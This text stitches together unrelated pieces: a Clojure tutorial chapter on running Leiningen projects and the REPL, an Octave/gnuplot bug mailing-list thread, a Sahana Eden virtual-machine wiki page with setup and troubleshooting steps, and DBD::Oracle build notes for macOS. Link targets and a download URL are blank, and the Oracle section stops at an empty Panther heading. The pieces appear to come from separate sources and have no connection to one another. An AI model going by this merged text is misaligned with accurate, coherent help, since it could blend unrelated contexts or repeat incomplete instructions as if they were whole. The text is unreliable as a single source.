This project skeleton isn’t inherently special or Clojure-y. It’s just a convention used by Leiningen. You’ll be using Leiningen to build and run Clojure apps, and Leiningen expects your app to have this structure. The first file of note is project.clj at ➊, which is a configuration file for Leiningen. It helps Leiningen answer such questions as “What dependencies does this project have?” and “When this Clojure program runs, what function should run first?” In general, you’ll save your source code in src/<project_name>. In this case, the file src/clojure_noob/core.clj at ➌ is where you’ll be writing your Clojure code for a while. The test directory at ➍ obviously contains tests, and resources at ➋ is where you store assets like images.
Running the Clojure Project
Now let’s actually run the project. Open src/clojure_noob/core.clj in your favorite editor. You should see this:
➊ (ns clojure-noob.core
  (:gen-class))

➋ (defn -main
  "I don't do a whole lot...yet."
  [& args]
➌ (println "Hello, World!"))
The lines at ➊ declare a namespace, which you don’t need to worry about right now. The
-main function at ➋ is the entry point to your program, a topic that is covered in Appendix A. For now, replace the text
"Hello, World!" at ➌ with
"I'm a little teapot!". The full line should read
(println "I'm a little teapot!")).
Next, navigate to the clojure_noob directory in your terminal and enter:
lein run
You should see the output
"I'm a little teapot!" Congratulations, little teapot, you wrote and executed a program!
You’ll learn more about what’s actually happening in the program as you read through the book, but for now all you need to know is that you created a function,
-main, and that function runs when you execute
lein run at the command line.
Building the Clojure Project
Using
lein run is great for trying out your code, but what if you want to share your work with people who don’t have Leiningen installed? To do that, you can create a stand-alone file that anyone with Java installed (which is basically everyone) can execute. To create the file, run this:
lein uberjar
This command creates the file target/uberjar/clojure-noob-0.1.0-SNAPSHOT-standalone.jar. You can make Java execute it by running this:
java -jar target/uberjar/clojure-noob-0.1.0-SNAPSHOT-standalone.jar
Look at that! The file target/uberjar/clojure-noob-0.1.0-SNAPSHOT-standalone.jar is your new, award-winning Clojure program, which you can distribute and run on almost any platform.
You now have all the basic details you need to build, run, and distribute (very) basic Clojure programs. In later chapters, you’ll learn more details about what Leiningen is doing when you run the preceding commands, gaining a complete understanding of Clojure’s relationship to the JVM and how you can run production code.
Before we move on to Chapter 2 and discuss the wonder and glory of Emacs, let’s go over another important tool: the REPL.
Using the REPL
The REPL is a tool for experimenting with code. It allows you to interact with a running program and quickly try out ideas. It does this by presenting you with a prompt where you can enter code. It then reads your input, evaluates it, prints the result, and loops, presenting you with a prompt again.
This process enables a quick feedback cycle that isn’t possible in most other languages. I strongly recommend that you use it frequently because you’ll be able to quickly check your understanding of Clojure as you learn. Besides that, REPL development is an essential part of the Lisp experience, and you’d really be missing out if you didn’t use it.
To start a REPL, run this:
lein repl
The output should look like this:
nREPL server started on port 28925
REPL-y 0.1.10
Clojure 1.9.0
clojure-noob.core=>
The last line,
clojure-noob.core=>, tells you that you’re in the
clojure-noob.core namespace. You'll learn about namespaces later, but for now notice that the namespace basically matches the name of your src/clojure_noob/core.clj file. Also, notice that the REPL shows the version as Clojure 1.9.0, but as mentioned earlier, everything will work okay no matter which version you use.
The prompt also indicates that your code is loaded in the REPL, and you can execute the functions that are defined. Right now only one function,
-main, is defined. Go ahead and execute it now:
clojure-noob.core=> (-main)
I'm a little teapot!
nil
Well done! You just used the REPL to evaluate a function call. Try a few more basic Clojure functions:
clojure-noob.core=> (+ 1 2 3 4)
10
clojure-noob.core=> (* 1 2 3 4)
24
clojure-noob.core=> (first [1 2 3 4])
1
Awesome! You added some numbers, multiplied some numbers, and took the first element from a vector. You also had your first encounter with weird Lisp syntax! All Lisps, Clojure included, employ prefix notation, meaning that the operator always comes first in an expression. If you’re unsure about what that means, don’t worry. You’ll learn all about Clojure’s syntax soon.
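To make the prefix idea concrete, here is a small illustration (not from the book's project) comparing each form with its infix equivalent:

```clojure
;; The operator (or function) always comes first inside the parentheses.
(+ 1 2 3 4)       ; infix equivalent: 1 + 2 + 3 + 4
; => 10
(* 2 (+ 3 4))     ; infix equivalent: 2 * (3 + 4) -- forms nest freely
; => 14
(first [1 2 3 4]) ; ordinary function calls use the same shape
; => 1
```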
Conceptually, the REPL is similar to Secure Shell (SSH). In the same way that you can use SSH to interact with a remote server, the Clojure REPL allows you to interact with a running Clojure process. This feature can be very powerful because you can even attach a REPL to a live production app and modify your program as it runs. For now, though, you’ll be using the REPL to build your knowledge of Clojure syntax and semantics.
One more note: going forward, this book will present code without REPL prompts, but please do try the code! Here’s an example:
(do (println "no prompt here!")
    (+ 1 3))
; => no prompt here!
; => 4
When you see code snippets like this, lines that begin with
; => indicate the output of the code being run. In this case, the text
no prompt here! should be printed, and the return value of the code is
4.
Clojure Editors
At this point you should have the basic knowledge you need to begin learning the Clojure language without having to fuss with an editor or integrated development environment (IDE). But if you do want a good tutorial on a powerful editor, Chapter 2 covers Emacs, the most popular editor among Clojurists. You absolutely do not need to use Emacs for Clojure development, but Emacs offers tight integration with the Clojure REPL and is well-suited to writing Lisp code. What’s most important, however, is that you use whatever works for you.
If Emacs isn’t your cup of tea, here are some resources for setting up other text editors and IDEs for Clojure development:
- This YouTube video will show you how to set up Sublime Text 2 for Clojure development:.
- Vim has good tools for Clojure development. This article is a good starting point:.
- Counterclockwise is a highly recommended Eclipse plug-in:.
- Cursive Clojure is the recommended IDE for those who use IntelliJ:
- Nightcode is a simple, free IDE written in Clojure:.
Summary
I’m so proud of you, little teapot. You’ve run your first Clojure program! Not only that, but you’ve become acquainted with the REPL, one of the most important tools for developing Clojure software. Amazing! It brings to mind the immortal lines from “Long Live” by one of my personal heroes:
You held your head like a hero
On a history book page
It was the end of a decade
But the start of an age
—Taylor Swift
Bravo!
On 2/23/13 6:52 PM, Ben Abbott wrote:
>
> On Feb 23, 2013, at 5:24 PM, Alexander Hansen wrote:
>
>> On 2/23/13 2:43 PM, Ben Abbott wrote:
>>> On Feb 23, 2013, at 4:36 PM, Alexander Hansen wrote:
>>>
>>>> On 2/23/13 2:07 PM, Ben Abbott wrote:
>>>>> On Feb 23, 2013, at 11:11 AM, Alexander Hansen wrote:
>>>>>
>>>>>> #Test case:
>>>>>>
>>>>>> A(1:512,1:512)=0;
>>>>>> A(256-10:256+10,256-10:256+10)= 255;
>>>>>>
>>>>>> #then either
>>>>>>
>>>>>> imagesc(A)
>>>>>>
>>>>>> #or
>>>>>>
>>>>>> image(A)
>>>>>>
>>>>>> I saw the bug reports about this issue:
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> but apparently it wasn't fixed.
>>>>>>
>>>>>> Is there a workaround other than changing the plot terminal?
>>>>>
>>>>> Not a desirable solution .... but did you try to revert to an earlier
>>>>> version of gnuplot?
>>>>>
>>>>> Ben
>>>>
>>>> No, because I didn't have one handy. This was in response to a bug
>>>> report against what we currently have in the Fink distribution (well,
>>>> really against Octave-3.6.3, since this was just before I added 3.6.4),
>>>> and I gave the OP the links as well as suggesting changing the terminal
>>>> type as a workaround.
>>>>
>>>> I'd rather not downgrade gnuplot globally unless I absolutely have to,
>>>> since other packages use it besides Octave.
>>>
>>> I did try to patch Octave gnuplot code to append "failsafe" to the plot
>>> command, but found that gnuplot would hang for your example.
>>>
>>> Sorry, I don't have a work around, but I'll give some more thought to it.
>>>
>>> Ben
>>
>> It wasn't hard to make up a package description for gnuplot-4.6.0, and
>> the test case worked using that.
>>
>> Since I've got a ludicrously large gnuplot namespace (10 package names)
>> already, I don't think I'll make up separate gnuplot-4.6.0 packages.
>> It's easy enough for me to add 4.6.0 back as an additional option and to
>> tell folks about the problem and workarounds in the user-visible package
>> information for our Octave packages.
> I let the gnuplot developers know.
>
> Ethan Merritt has suggested we try to revert the patch below.
>
> Do you have time to confirm that will fix the problem?
>
> Ben

Yeah, reverting that fixed the issue.

--
Alexander Hansen, Ph.D.
Fink User Liaison
My package updates:
Table of Contents
Virtual Machine
Summary
This virtual machine has been built to allow Developers to get operational quickly:
It is in the Open Virtual Machine format for use in either VirtualBox or VMWare.
It is currently running the Ubuntu 10.04 OS with Web2Py-r2717, Eden-r1560 & Eclipse 3.5 (this needs confirmed)
Download
409 MB OVF format for VirtualBox:
385 MB VMX format for VMware:
Original source site with the original patches available here, along with documentation and usage notes.
Usage Notes
Important
It's been reported that VMs derived from patched ISOs, as these have been, may have network problems. Read this article to work out the solution. Contact us if you still have problems. There's no way for us to test whether there will be problems in your case.
Introduction
The dev env virtual machines for Virtualbox and VMware are based on a blueprint and are configured to use about 512MB of RAM. The virtual disk is configured to expand to 20GB. The virtual machine is built on TurnKey Linux's Core, which in turn is based on Ubuntu 10.04 (Lucid -- the most recent long-term support release). The machine runs Shellinabox, Webmin, and SSH/sftp as services from startup.
The development environment is configured to launch LXDE, a lightweight desktop environment after the first boot. From LXDE, Eclipse with Pydev, Firefox with Firebug, iPython and irssi are accessible.
Getting Started
- Download the Image
- Uncompress the image: 7zip is a very effective FOSS tool for systems running Microsoft OSs. In Linux distros, the following command should work:
tar xvzf eden-dev-env.tar.gz (for example) #extract to current working directory
To run the image, you need to install either VirtualBox or VMWare:
VirtualBox Installation
- Download VirtualBox
- Install VirtualBox
- Import the Virtual Appliance:
- File menu | Import Appliance
- Click on the Choose button and navigate to and select the uncompressed image (the .ovf file)
- Accept the default appliance options unless you have a reason to make a specific change
- The VM will appear in the left window pane, and the settings will appear in the right. Scroll down on the right side until you see "Network." Click network to specify the NIC (e.g. switch to wireless) and choose between bridged and NAT mode.
- Start the Virtual Appliance by double-clicking the icon on the left.
Troubleshooting VirtualBox
Network Configuration
Solutions will be here.
Import Fails
Scenario
After the first step of import, VirtualBox OSE 3.1.6 reports the following: "Failed to import appliance /path/to/appliance/NewDev.ovf. Too many IDE controllers in OVF; import facility only supports one."
First Solution:
- File | Virtual Machine Manager: Select the hard disks tab and press add disk icon. Browse to and select NewDev.vmdk. Click OK.
- Click the New icon. Click next. Name: NewDev; Operating System: Linux; Version: Ubuntu. Click next.
- Base Memory Size: 384MB. Click Next.
- Select "Use Existing Hard Disk"; choose NewDev.vmdk. Click Next. Click finish.
- Select NewDev on the left; scroll down to network on the right. Ensure the appropriate network adapter and settings for your circumstances are selected.
Boot Process Halts
Scenario
When started in VirtualBox OSE 3.1.6, NewDev boot process halts at "Starting Initialization Hooks".
Solution
VMWare Installation
Import
To import the download VM into VMware (e.g. Fusion), use the following steps.
- File > New
- Click Continue without disc
- Select Use an existing virtual disk
- Select NewDev.vmdk
- Select Make a separate copy of the virtual disk
- Click Choose
- Click Continue
- OS=Linux and Version=Ubuntu should be selected, click Continue, Click Finish
VMware Converter Version 4.0.1: "Cannot be deployed on the target hardware"
VMware Player 3.1.1 (Ubuntu)
No File|Import option. Nor can one build a VM with a preexisting VMDK.
VMware Workstation 7.1.1
- File | New | Virtual Machine
- Custom, click Next
- Workstation 7.x, click Next
- I will install the operating system later, click Next
- Name: !NewVM; Location: /path/to/virtualmachines/; click Next; click Next.
- 360 MP; click Next
- Select appropriate network connection for your scenario (bridged or NAT), click Next.
- LSI Logic, click Next.
- Use an existing virtual disk; click Next.
- Browse to NewDev.vmdk; click Next.
- Finish; Close.
- Press the play icon or "Power on this virtual machine".
Web2py administration password is set during the debugging process with either of the following commands and arguments, both of which would set the admin password to "admin":
/home/dev/web2py.py -a admin -i 127.0.0.1 -p 80
/home/dev/web2py.py --password admin -i 127.0.0.1 -p 80
User Accounts
Credentials for the previous version:
Credentials for the current version should be set on first boot: Root password is set through a dialog box on first boot. The user named dev should be set from the command line when first boot is complete with the command passwd dev.
Scenario
Neither user can log in to LXDE with the credentials provided. However, both users can login with the password eden in single-user mode / at the command line interface.
Solution
Pending
Secure the System
Change the default passwords to secure the system. Log in as dev, start LXTerminal, and enter the following commands to change passwords:
sudo passwd root   # interactive change root password
passwd             # interactive change dev password
It's also important to keep getting security updates; log in as dev and execute the following:
sudo apt-get update
sudo apt-get upgrade
Filesystem
Web2py is located in /home/web2py. Eden is located in /home/web2py/applications/eden. Eclipse and PyDev are preconfigured with this information.
Scripts
/usr/local/bin contains three helpful scripts. To run them, start LXTerminal (in the accessories menu) and simply enter the commands as demonstrated below. They are in all users' paths, so may be executed from any working directory.
Update web2py
Enter the command with or without a revision number, as demonstrated below:
update_web2py 2717   # updates web2py to rev 2717
update_web2py        # updates web2py to recent revision
Update Eden

update_eden 1560   # updates Eden to rev 1560
update_eden        # updates Eden to recent revision

Import Eden

Imports Eden to Web2py

import   # imports models to web2py
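The wiki doesn't show the scripts' contents. As a rough sketch (the function name and echo messages below are hypothetical; only the optional-revision-argument handling mirrors the usage above), such a wrapper might look like:

```shell
#!/bin/sh
# Hypothetical sketch of an update_web2py-style wrapper script.
# A revision number is optional; with no argument, update to the latest.
update_sketch() {
    REV="$1"
    if [ -n "$REV" ]; then
        echo "updating to revision $REV"
    else
        echo "updating to latest revision"
    fi
}

update_sketch 2717
update_sketch
```

The real scripts would replace the echo lines with the actual bzr/svn update commands for the web2py and Eden trees.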
Troubleshooting older Releases
Note: If you get a ticket when running the application for the 1st time with a message like "OperationalError: Cannot add a UNIQUE column" then you need to stop the debugger, delete the contents of the databases folder & then start debugging again (there was an old database accidentally left on the system which cannot be auto-migrated - a new image without this issue has been uploaded):
rm -rf ~/Desktop/web2py/applications/eden/databases/*
If you get an error like "AttributeError: SQLCustomType instance has no attribute 'startswith'" then:
cd ~/Desktop/web2py/gluon
rm sql.py
wget
Then can proceed as above: Stop Eclipse, empty databases folder & restart Eclipse
A new image without this issue has now been uploaded.
InstallationGuidelinesVirtualMachineMaintenance
InstallationGuidelinesDeveloper | https://eden.sahanafoundation.org/wiki/InstallationGuidelinesVirtualMachine?version=106 | CC-MAIN-2022-05 | refinedweb | 1,139 | 56.25 |
I was hoping to ask a pretty simple question. I have come across the below code and have not been able to find a decent explanation as to:
.attrs
['href']
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen("url")
bsObj = BeautifulSoup(html)
for link in bsObj.findAll("a"):
if 'href' in link.attrs:
print (link.attrs['href'])
Let's try to fetch this question it self and see:
from urllib.request import urlopen
from bs4 import BeautifulSoup

html = urlopen("")
bsObj = BeautifulSoup(html)
i) what exactly does the .attrs function do in this code
In [6]: bsObj.findAll("a")[30]
Out[6]: <a class="question-hyperlink" href="/questions/39308028/beautifuelsoup-python">Beautifuelsoup - Python</a>

In [7]: bsObj.findAll("a")[30].attrs
Out[7]: {'class': ['question-hyperlink'], 'href': '/questions/39308028/beautifuelsoup-python'}

In [8]: type(bsObj.findAll("a")[30])
Out[8]: bs4.element.Tag
If you read the documentation, you will notice that a tag may have any number of attributes. In the element number 30, the tag has attributes 'class' and 'href'
ii) what is the function of the ['href'] part at the end
In [9]: bsObj.findAll("a")[30]['href']
Out[9]: '/questions/39308028/beautifuelsoup-python'
If you look at the above output, you will see that the tag had an attribute 'href' and the above code fetched us the value for that attribute.
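To see why both pieces of syntax work, note that a Tag's .attrs is a plain Python dict, so 'href' in link.attrs is ordinary dict membership and ['href'] is ordinary dict indexing. A minimal sketch without any network fetch (the values are copied from the output above):

```python
# .attrs on a bs4 Tag is just a dict of the tag's HTML attributes.
attrs = {'class': ['question-hyperlink'],
         'href': '/questions/39308028/beautifuelsoup-python'}

has_href = 'href' in attrs    # the membership test used in the loop
href_value = attrs['href']    # plain dict indexing

print(has_href)    # True
print(href_value)  # /questions/39308028/beautifuelsoup-python
```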
Import certificate via keytool. To import the certificate downloaded in step 1 on a Windows PC, run cmd as administrator and type:

keytool -import -alias alias -keystore "C:\Progra~1\Android\Android Studio\3.0\jre\jre\lib\security\cacerts" -file path_to/certificate_file

Also, you may use a web browser or openssl.
Vpn uk free android
A user-based voting system along with a very active user community gives a major advantage to this website over other torrent sites, which act just as an index.
this limitation is going to be removed in vpn uk free android future releases. Sample VPN profileXML Following is the sample VPN profileXML.
Vpn uk free android in USA and United Kingdom!
after you complete Psiphon download, free and open-sourced The Psiphon 3 app and all vpn uk free android its fundamental products are open-source and free to use. This feature represents the liberty provided by the developers; hence, you would enjoy the internet browsing activities to its complete extent.
TorGuard offers a handful of servers that work with the aforementioned Cisco AnyConnect environment. If you have a Chromebook from work, or have ever needed to connect to a work network on your Chromebook, this is probably what you've used.
The Reef needs a stronger champion to defend it from industrialisation, overfishing and a multitude of other threats.
Note: If you need to remove an exception you made, click on the (X) button seen in the image before the URL. It will then not block any images on that exact URL but will still block images everywhere else on the same website.
feel free vpn uk free android to send us your questions and feedback on, in our discussion forums, all the lists of alternatives are crowd-sourced, that's right, and that's what makes the data powerful and relevant.just open the program and click vpn uk free android on the connect button. Tunnel light - Best VPN master is a stable application that will help you deal with any kind of blocking. You no longer need to change anything in your settings,like the Salah al-Burki Brigade, some groups in Tripoli, have refused vpn uk free android to accept the authority of the GNA.
Vagrant host vpn:
now one thing that annoys me a bit where there vpn uk free android are ads for a fortune teller on Cath-info who is dressed as a priest. Those sponsored links dont seem to get blocked by basic adblocking tools.
the route can be provided either for your network alone or for all the traffic. Forwarding routes Provide the forwarding route to send the traffic through vpn uk free android the VPN interface to the destination. Based on the Connection Type selected,proxy, or unblocker service. Because our content library can vary vpn uk free android by region and these types of connections are frequently used to bypass geolocation methods, you seem to be using an unblocker or proxy It indicates that our systems have detected that you are connecting via a VPN,
additionally, you can also avoid annoying censorship and access to any website or app that was originally blocked in your network. VPN to effective route their www proxy tunnel internet traffic to the game server. Since youre behind a virtual network, as for vpn uk free android gaming purpose, gamers use.
find it vpn uk free android in the list of Add-ons and click Enable, how to remove extensions and themes Shortcut: If an add-on is on your toolbar, to re-enable the add-on, then restart Firefox if required.if you had another machine to act as the vpn uk free android VPN client, privoxy) for the rest of your network, and that includes any attempt to use a local proxy! AND that machine also established a proxy (e.g.,) but all is not lost once you understand WHY you cant do it.
Technology: no small business can succeed without it. Your network not only provides secure connectivity to your employees, but also to your community of partners, suppliers, and customers. With VPN, you can secure your network and also offer secure access to remote partners and employees.
ChannelArchiver I/O Library

index.htm: Class Reference.
Purpose

All Channel Archiver Tools are based on this I/O library. Currently it supports these data storage formats:
- BinArchive: A binary archive of interlinked files.
For maintaining these files, see the cardminer tool as well as the ArchiveManager documentation.
- MultiArchive: A set of BinArchives. See doc/libio/MultiArchive.h
- Possible future ideas: some SDDS-based format, an RDB interface, etc.
Coding standards
Class design

I tried to follow the suggestions of Meyers' Effective C++ books and also aim to keep the I/O library open for replacement of the data file format. Please note that this tends to bloat the code a bit. Example: A number in a C program could be defined as simply

    float number;

In a hardcore C++ program on the other hand this turns into

    class Number : public ObjectTreeRoot
    {
    public:
        Number(float number)   { _number = number; }
        float get()            { return _number; }
        void set(float number) { _number = number; }
        friend ostream & operator<<(ostream &o, const Number &n)
        { o << n._number; return o; }
    private:
        float _number;
    };

This is comparably more code. The advantage is that it allows for transparent changes of the number's type. If all inlined, the C++ code needn't be slower nor will the object code be bigger. But it sure is more source code. And I didn't even use an abstract number base class...
To remain reasonable, this standard is not applied to each "number" but it is being followed for the Archive, Channel and Value related I/O classes. This already kept the Manager, CGIExport and casi tools independent from the used Archive type (BinArchive or MultiArchive).
Layout.htm explains the class layout in more detail, index.htm is a commented Class Reference generated from the header files.
Standard C++ library

The standard C++ library as defined in the 1997 Stroustrup book contains string, list, map, exception, ... classes. It is used whenever possible to prevent reinvention. While there are some similar classes in EPICS base, those are not used because they don't constitute as complete a suite.
Unfortunately, std::string showed a memory leak with RedHat 6.1 (that version of egcs g++ to be specific). Tools/stdString was introduced as a replacement. It can be used like std::string but implements only what was necessary so far.
Namespaces

Whenever possible, code is enclosed in a namespace Tools or ChanArch. For MS Visual C++ this is even required because of conflicts with the "list" definition in resourceLib.h. It can be disabled via a #define in ToolsConfig.h.
- NAME
- VERSION
- General Info
- Instructions for 10.7.x (Lion)
- Instructions for 10.6.x (Snow Leopard)
- Instructions for 10.2.x (Jaguar)
- Instructions for 10.3.x (Panther)
- AUTHORS
NAME
DBD::Oracle::Troubleshooting::Macos - Tips and Hints to Troubleshoot DBD::Oracle on MacOs
VERSION
version 1.74
General Info
These instructions allow for the compilation and successful testing of DBD::Oracle on MacOS X 10.2.4 and higher, using Oracle 9iR2 DR (Release 9.2.0.1.0) or the 10g Instant Client release (10.1.0.3 at the time of writing).
MacOS X DBD::Oracle has been tested (and used) under Jaguar (10.2.x), Panther (10.3.x), Snow Leopard (10.6.x), Lion (10.7.x). Jaguar comes with a Perl version of 5.6.0., which I can report to work with DBD::Oracle 1.14 and higher once you take certain steps (see below). You may want to install a later perl, e.g., Perl 5.8.x. Please refer to:
Installing Perl 5.8 on Jaguar
for Perl 5.8.0 installation instructions.
DBD::Oracle is likely to not install out of the box on MacOS X 10.2. nor on 10.3. Manual but different changes will most likely be required on both versions.
The key problem on 10.2. (Jaguar) is a symbol clash (caused by a function poll() named identically) between the IO library in at least Perl 5.6.0 (which is the version that comes with 10.2) and the Oracle client library in 9iR2 developer's release for MacOS X. The symptom is that your build appears to compile fine but then fails in the link stage. If you are running a (possibly self-installed) version of Perl other than 5.6.0, there's a chance that you are not affected by the symbol clash. So, try to build first without any special measures, and only resort to the instructions below if your build fails in the link stage with a duplicate symbol error. Note: if it fails to even compile, solve that problem first since it is not due to the symbol clash.
The key problem on 10.3 (Panther) is that the default perl that comes with the system is compiled with multi-threading turned on, which at least with the 9iR2 developer's release exposes a memory leak. Your DBD::Oracle build will compile, test, and install fine, but if you execute the same prepared statement multiple times, the process will quickly run up hundreds of megabytes of RAM, and depending on how much memory you have it will die sooner or later.
Oracle recently released an "Instant Client" for MacOSX 10.3 (Panther), which as far as I can attest has none of the problems above. Since it is also a very compact download (actually, a series of downloads) I highly recommend you install and use the Instant Client if you are on 10.3 (Panther) and you do not intend to run the Oracle database server on your MacOSX box. See below (Instructions for 10.3.x) for details.
Instructions for 10.7.x (Lion)
Perl on Lion and later is built with 64-bit support, and therefore requires the 64-bit Instant Client. As of this writing, only Instant Client 11.2 (64-bit) actually works. The 64-bit Instant Client 10.2 is incompatible with Lion. We therefore recommend the 11.2 client. If you must Instant Client 10.2, you may need to recompile Perl with 32-bit support.
Either way, setup and configuration is the same:
Download and install the basic, sqlplus, and sdk instantclient libraries and install them in a central location, such as /usr/oracle_instantclient. Downloads here
Create a symlink from libclntsh.dylib.10.1 to libclntsh.dylib:
cd /usr/oracle_instantclient/
ln -s libclntsh.dylib.* libclntsh.dylib
ln -s libocci.dylib.* libocci.dylib
Update your environment to point to the libraries:
export ORACLE_HOME=/usr/oracle_instantclient
export DYLD_LIBRARY_PATH=$DYLD_LIBRARY_PATH:/usr/oracle_instantclient
You should now be able to install DBD::Oracle from CPAN:
cpan DBD::Oracle
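Once the driver installs cleanly, a quick connectivity check can be done from Perl. This is only a sketch: the EZCONNECT string, username, and password below are placeholders you must replace with your own.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use DBI;

# Placeholder connection details -- substitute your host/service/credentials.
my $dbh = DBI->connect('dbi:Oracle://db.example.com:1521/XE',
                       'scott', 'tiger',
                       { RaiseError => 1, PrintError => 0 })
    or die "connect failed: $DBI::errstr";

# Trivial round trip through the server.
my ($stamp) = $dbh->selectrow_array('SELECT sysdate FROM dual');
print "connected ok, sysdate = $stamp\n";
$dbh->disconnect;
```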
Instructions for 10.6.x (Snow Leopard)
These are taken from a stackoverflow answer by "nickisfat" who gave his/her permission for its inclusion here. You can see the original question and answers at.
Getting a mac install of perl to play nicely with oracle is a bit of a pain - once it's running it is fantastic, getting it running is a little frustrating..
The below has worked for me on a few different intel macs, there could well be superfluous steps in there and it is likely not going to be the same for other platforms.
This will require use of shell, the root user and a bit of CPANing - nothing too onerous
First off create a directory for the oracle pap - libraries, instant client etc
sudo mkdir /usr/oracle_instantClient64
Download and extract all 64 bit instant client packages from oracle to the above directory
Create a symlink within that directory for one of the files in there
cd /usr/oracle_instantClient64
sudo ln -s /usr/oracle_instantClient64/libclntsh.dylib.10.1 libclntsh.dylib
The following dir is hardcoded into the oracle instant client - god knows why - so need to create and symlink it
sudo mkdir -p /b/227/rdbms/
cd /b/227/rdbms/
sudo ln -s /usr/oracle_instantClient64/ lib
Need to add a couple of environment variables, so edit /etc/profile and add them so they exist for all users:
export ORACLE_HOME=/usr/oracle_instantClient64
export DYLD_LIBRARY_PATH=/usr/oracle_instantClient64
Now try and install DBD::Oracle through CPAN - this will fail, but it means any dependencies will be downloaded and it retrieves the module for us
sudo perl -MCPAN -e shell
install DBD::Oracle
When this fails exit CPAN and head to your .cpan/build dir - if you used automatic config of CPAN it'll be
cd ~/.cpan/build
if you didn't auto configure you can find your build directory with the following command in CPAN
o conf build_dir
Once in the build dir look for the DBD::Oracle dir which has just been created (it'll be called something like DBD-Oracle-1.28-?) and cd into it.
Now we need to switch to the root user. Root isn't enabled as default in osx - for details on enabling see this post on the apple website
Once logged in as root we need to set the above environment variables for root:
export ORACLE_HOME=/usr/oracle_instantClient64
export DYLD_LIBRARY_PATH=/usr/oracle_instantClient64
Now while still logged in as root we need to run the makefile for the module, then make, then install
perl Makefile.PL
make
make install
Assuming that all worked without error log out of root: we're DBD'd up! If this didn't work it's time to bust out google on whatever errors you're seeing
Now just to install the DBI module
sudo perl -MCPAN -e shell
install DBI
Now you're all set - enjoy your perly oracley new life
Instructions for 10.2.x (Jaguar)
1) Install Oracle exactly per Oracle documentation. If you change install locations, then you'll need to modify paths accordingly.
2) There are two ways to remedy the symbol clash. Either edit the symbol table of the Oracle client library $ORACLE_HOME/lib/libclntsh.dylib.9.0 such that the symbol _poll is no longer exported. Alternatively, download, patch, and re-install the perl IO modules. I could not successfully repeat the report for the former, but I did succeed by doing the latter. Instructions for both follow nonetheless.
2a) SKIP IF YOU WANT TO OR HAVE SUCCESSFULLY TRIED 2b). Make a backup copy of the $ORACLE_HOME/lib/libclntsh.dylib.9.0 file, or the file this name points to, since we're about to modify that library. Note that the ".9.0" suffix of the file name is version dependent, and that you want to work with the file pointed to through one or a series of symbolic links rather than any of the symbolic links (e.g., one will be called libclntsh.dylib). As user 'oracle' execute the following command to fix namespace collisions in Oracle's dynamic libraries:

$ nmedit -R ./hints/macos_lib.syms $ORACLE_HOME/lib/libclntsh.dylib.9.0

*** Recall the above caveats regarding the file name. The problem with this is that the version of nm that comes with Jaguar doesn't support the -R flag. I'd be grateful to anyone who can suggest how to edit the symbol table of libraries on MacOS X.

2b) SKIP IF YOU WANT TO OR HAVE SUCCESSFULLY TRIED 2a). In this variant, we will patch the Perl IO modules to change the name of the poll() function, as that is where it is defined. In this case, we do not need to do anything with the Oracle libraries. Follow these steps:

- Download the module IO (IO.pm) from CPAN and unpack it. Check the documentation as to whether the version is compatible with your version of Perl; I used v1.20 with Perl 5.6.0 and had success.

- The files IO.xs, poll.c, and poll.h need to be patched. Apply the following patches, e.g., by cutting and pasting the marked section into a file perlio.patch and using that file as input for patch:

$ patch -p0 < perlio.patch

The patch will basically rename the C implementation of poll() to io_poll(). The other patches were necessary to make v1.20 compile with Perl 5.6.0; they may not be necessary with other versions of IO and Perl, respectively.
+=+=+=+=+=+=+= Cut after this line
diff -c ../IO-orig/IO-1.20/IO.xs ./IO.xs
*** ../IO-orig/IO-1.20/IO.xs    Mon Jul 13 23:36:24 1998
--- ./IO.xs     Sat May 10 15:20:02 2003
***************
*** 205,211 ****
        ST(0) = sv_2mortal(newSVpv((char*)&pos, sizeof(Fpos_t)));
      }
      else {
!       ST(0) = &sv_undef;
        errno = EINVAL;
      }
--- 205,211 ----
        ST(0) = sv_2mortal(newSVpv((char*)&pos, sizeof(Fpos_t)));
      }
      else {
!       ST(0) = &PL_sv_undef;
        errno = EINVAL;
      }
***************
*** 249,255 ****
        SvREFCNT_dec(gv);   /* undo increment in newRV() */
      }
      else {
!       ST(0) = &sv_undef;
        SvREFCNT_dec(gv);
      }
--- 249,255 ----
        SvREFCNT_dec(gv);   /* undo increment in newRV() */
      }
      else {
!       ST(0) = &PL_sv_undef;
        SvREFCNT_dec(gv);
      }
***************
*** 272,278 ****
        i++;
        fds[j].revents = 0;
    }
!   if((ret = poll(fds,nfd,timeout)) >= 0) {
        for(i=1, j=0 ; j < nfd ; j++) {
            sv_setiv(ST(i), fds[j].fd); i++;
            sv_setiv(ST(i), fds[j].revents); i++;
--- 272,278 ----
        i++;
        fds[j].revents = 0;
    }
!   if((ret = io_poll(fds,nfd,timeout)) >= 0) {
        for(i=1, j=0 ; j < nfd ; j++) {
            sv_setiv(ST(i), fds[j].fd); i++;
            sv_setiv(ST(i), fds[j].revents); i++;
diff -c ../IO-orig/IO-1.20/poll.c ./poll.c
*** ../IO-orig/IO-1.20/poll.c   Wed Mar 18 21:34:00 1998
--- ./poll.c    Sat May 10 14:28:22 2003
***************
*** 35,41 ****
  # define POLL_EVENTS_MASK (POLL_CAN_READ | POLL_CAN_WRITE | POLL_HAS_EXCP)

  int
! poll(fds, nfds, timeout)
      struct pollfd *fds;
      unsigned long nfds;
      int timeout;
--- 35,41 ----
  # define POLL_EVENTS_MASK (POLL_CAN_READ | POLL_CAN_WRITE | POLL_HAS_EXCP)

  int
! io_poll(fds, nfds, timeout)
      struct pollfd *fds;
      unsigned long nfds;
      int timeout;
diff -c ../IO-orig/IO-1.20/poll.h ./poll.h
*** ../IO-orig/IO-1.20/poll.h   Wed Apr 15 20:33:02 1998
--- ./poll.h    Sat May 10 14:29:11 2003
***************
*** 44,50 ****
  #define POLLHUP 0x0010
  #define POLLNVAL 0x0020

! int poll _((struct pollfd *, unsigned long, int));

  #ifndef HAS_POLL
  # define HAS_POLL
--- 44,50 ----
  #define POLLHUP 0x0010
  #define POLLNVAL 0x0020

! int io_poll _((struct pollfd *, unsigned long, int));

  #ifndef HAS_POLL
  # define HAS_POLL
+=+=+=+=+=+=+= Cut to the previous line

- Compile and install as you usually would, making sure that existing but conflicting modules get removed:

$ perl Makefile.PL
$ make
$ make test
$ make install UNINST=1

- You are done. Continue with 3).
3) Install the module DBI as per its instructions, if you haven't already done so.
4) Install the DBD::Oracle module.
$ perl Makefile.PL
$ make
$ make test
$ make install
Instructions for 10.3.x (Panther)
